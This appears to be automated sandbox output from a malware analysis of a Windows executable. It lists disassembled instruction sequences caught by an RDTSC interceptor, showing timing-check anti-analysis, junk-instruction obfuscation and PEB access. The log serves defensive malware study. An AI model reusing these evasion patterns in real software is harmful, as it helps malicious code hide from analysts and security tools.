Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: BA3018 second address: BA3023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: BBB907 second address: BBB92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F5BD0C7BA6Ah 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F5BD0C7BA66h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C89993 second address: C89998 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C889CB second address: C889F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F5BD0C7BA66h 0x0000000e jmp 00007F5BD0C7BA77h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C88E40 second address: C88E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5BD0FFF0D7h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C88E5E second address: C88E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C88E68 second address: C88E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F5BD0FFF0CEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8913B second address: C89141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C89298 second address: C8929C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8929C second address: C892A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C892A6 second address: C892AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C892AC second address: C892B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8D9D6 second address: C8D9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8DCA7 second address: C8DCAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F3AD second address: C8F3D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5BD0FFF0D1h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jnc 00007F5BD0FFF0C6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F3D5 second address: C8F3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F3DB second address: C8F3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F3E0 second address: C8F41D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA73h 0x00000007 pushad 0x00000008 jmp 00007F5BD0C7BA76h 0x0000000d jmp 00007F5BD0C7BA6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F41D second address: C8F423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C910E8 second address: C910EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C910EE second address: C9111F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BD0FFF0CEh 0x0000000b jmp 00007F5BD0FFF0D3h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007F5BD0FFF0C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C9111F second address: C91123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70019 second address: 6F7001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7001D second address: 6F7003A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7003A second address: 6F70040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70040 second address: 6F70060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BD0C7BA75h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70060 second address: 6F70066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70066 second address: 6F7006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7006A second address: 6F7008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5BD0FFF0CFh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7008B second address: 6F700AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000030h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5BD0C7BA72h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F700AD second address: 6F700B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F700B3 second address: 6F70182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0C7BA6Ch 0x00000009 add ch, FFFFFFE8h 0x0000000c jmp 00007F5BD0C7BA6Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F5BD0C7BA78h 0x00000018 xor cx, 5048h 0x0000001d jmp 00007F5BD0C7BA6Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 sub esp, 18h 0x00000029 pushad 0x0000002a call 00007F5BD0C7BA74h 0x0000002f pushfd 0x00000030 jmp 00007F5BD0C7BA72h 0x00000035 and ecx, 6444F5D8h 0x0000003b jmp 00007F5BD0C7BA6Bh 0x00000040 popfd 0x00000041 pop ecx 0x00000042 mov esi, ebx 0x00000044 popad 0x00000045 push ecx 0x00000046 jmp 00007F5BD0C7BA70h 0x0000004b mov dword ptr [esp], ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov bl, DEh 0x00000053 pushfd 0x00000054 jmp 00007F5BD0C7BA76h 0x00000059 xor cx, 3A98h 0x0000005e jmp 00007F5BD0C7BA6Bh 0x00000063 popfd 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70182 second address: 6F7019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0FFF0D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7019A second address: 6F7022C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [eax+10h] 0x0000000e jmp 00007F5BD0C7BA76h 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F5BD0C7BA6Eh 0x0000001b jmp 00007F5BD0C7BA75h 0x00000020 popfd 0x00000021 pushad 0x00000022 mov di, ax 0x00000025 jmp 00007F5BD0C7BA6Ah 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov bx, D394h 0x00000032 pushfd 0x00000033 jmp 00007F5BD0C7BA6Dh 0x00000038 sub ch, 00000056h 0x0000003b jmp 00007F5BD0C7BA71h 0x00000040 popfd 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7022C second address: 6F70230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70230 second address: 6F70243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70243 second address: 6F70249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70249 second address: 6F702D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [761C06ECh] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F5BD0C7BA74h 0x00000018 adc esi, 2BB5D808h 0x0000001e jmp 00007F5BD0C7BA6Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F5BD0C7BA78h 0x0000002a sub cx, FA68h 0x0000002f jmp 00007F5BD0C7BA6Bh 0x00000034 popfd 0x00000035 popad 0x00000036 test esi, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ecx, edx 0x0000003d call 00007F5BD0C7BA77h 0x00000042 pop eax 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F702D3 second address: 6F7031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BD0FFF0D4h 0x00000008 pop ecx 0x00000009 mov cx, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F5BD0FFFF18h 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 jmp 00007F5BD0FFF0D4h 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ah, dl 0x00000025 mov dx, ax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7031A second address: 6F7032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7032C second address: 6F70330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70330 second address: 6F7039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5BD0C7BA6Eh 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F5BD0C7BA6Eh 0x00000016 xor cx, F648h 0x0000001b jmp 00007F5BD0C7BA6Bh 0x00000020 popfd 0x00000021 mov ah, 69h 0x00000023 popad 0x00000024 call dword ptr [76190B60h] 0x0000002a mov eax, 758CD620h 0x0000002f ret 0x00000030 pushad 0x00000031 mov cl, bl 0x00000033 popad 0x00000034 push 00000044h 0x00000036 jmp 00007F5BD0C7BA74h 0x0000003b pop edi 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f call 00007F5BD0C7BA6Ch 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7039D second address: 6F703B0 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, D223h 0x0000000b popad 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703B0 second address: 6F703B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703B6 second address: 6F703E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5BD0FFF0CBh 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BD0FFF0D0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703E5 second address: 6F703EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703EB second address: 6F703F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703F0 second address: 6F703F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F703F6 second address: 6F70434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [eax] 0x00000009 jmp 00007F5BD0FFF0D6h 0x0000000e mov eax, dword ptr fs:[00000030h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5BD0FFF0D7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70434 second address: 6F70461 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F5BD0C7BA75h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [eax+18h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5BD0C7BA6Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F704DE second address: 6F70526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5BD0FFF0CDh 0x00000012 or ax, 7126h 0x00000017 jmp 00007F5BD0FFF0D1h 0x0000001c popfd 0x0000001d mov edx, esi 0x0000001f popad 0x00000020 mov dword ptr [esi], edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70526 second address: 6F7052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7052A second address: 6F7052E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7052E second address: 6F70534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70534 second address: 6F705B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0FFF0D8h 0x00000009 sbb cx, F528h 0x0000000e jmp 00007F5BD0FFF0CBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+04h], eax 0x0000001a pushad 0x0000001b mov cl, 69h 0x0000001d push edi 0x0000001e movzx esi, dx 0x00000021 pop ebx 0x00000022 popad 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F5BD0FFF0D2h 0x0000002d and esi, 0ECB82B8h 0x00000033 jmp 00007F5BD0FFF0CBh 0x00000038 popfd 0x00000039 call 00007F5BD0FFF0D8h 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F705B3 second address: 6F70655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esi+0Ch], eax 0x00000009 pushad 0x0000000a call 00007F5BD0C7BA6Dh 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+4Ch] 0x00000019 jmp 00007F5BD0C7BA79h 0x0000001e mov dword ptr [esi+10h], eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F5BD0C7BA6Ch 0x00000028 sbb ax, 41D8h 0x0000002d jmp 00007F5BD0C7BA6Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [ebx+50h] 0x00000037 jmp 00007F5BD0C7BA75h 0x0000003c mov dword ptr [esi+14h], eax 0x0000003f jmp 00007F5BD0C7BA6Eh 0x00000044 mov eax, dword ptr [ebx+54h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F5BD0C7BA77h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70655 second address: 6F7065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7065B second address: 6F7065F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7065F second address: 6F70676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0FFF0CAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70676 second address: 6F70708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BD0C7BA74h 0x00000013 add si, 8B58h 0x00000018 jmp 00007F5BD0C7BA6Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esi+1Ch], eax 0x00000022 jmp 00007F5BD0C7BA75h 0x00000027 mov eax, dword ptr [ebx+5Ch] 0x0000002a jmp 00007F5BD0C7BA6Eh 0x0000002f mov dword ptr [esi+20h], eax 0x00000032 jmp 00007F5BD0C7BA70h 0x00000037 mov eax, dword ptr [ebx+60h] 0x0000003a jmp 00007F5BD0C7BA70h 0x0000003f mov dword ptr [esi+24h], eax 0x00000042 pushad 0x00000043 mov edx, eax 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70708 second address: 6F70717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+64h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70717 second address: 6F7071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7071B second address: 6F7071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7071F second address: 6F70725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70725 second address: 6F7072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7072B second address: 6F7072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7072F second address: 6F7074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0FFF0D3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7074F second address: 6F707E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0C7BA6Fh 0x00000009 sbb ch, FFFFFF9Eh 0x0000000c jmp 00007F5BD0C7BA79h 0x00000011 popfd 0x00000012 mov ecx, 33E34F67h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+68h] 0x0000001d pushad 0x0000001e mov esi, 5480C45Fh 0x00000023 mov esi, 4097477Bh 0x00000028 popad 0x00000029 mov dword ptr [esi+2Ch], eax 0x0000002c pushad 0x0000002d jmp 00007F5BD0C7BA6Ch 0x00000032 pushfd 0x00000033 jmp 00007F5BD0C7BA72h 0x00000038 add ax, 43F8h 0x0000003d jmp 00007F5BD0C7BA6Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov ax, word ptr [ebx+6Ch] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F5BD0C7BA70h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F707E3 second address: 6F707E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F707E9 second address: 6F70801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 82B3h 0x00000007 mov cx, 970Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov word ptr [esi+30h], ax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70801 second address: 6F70805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70805 second address: 6F7081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
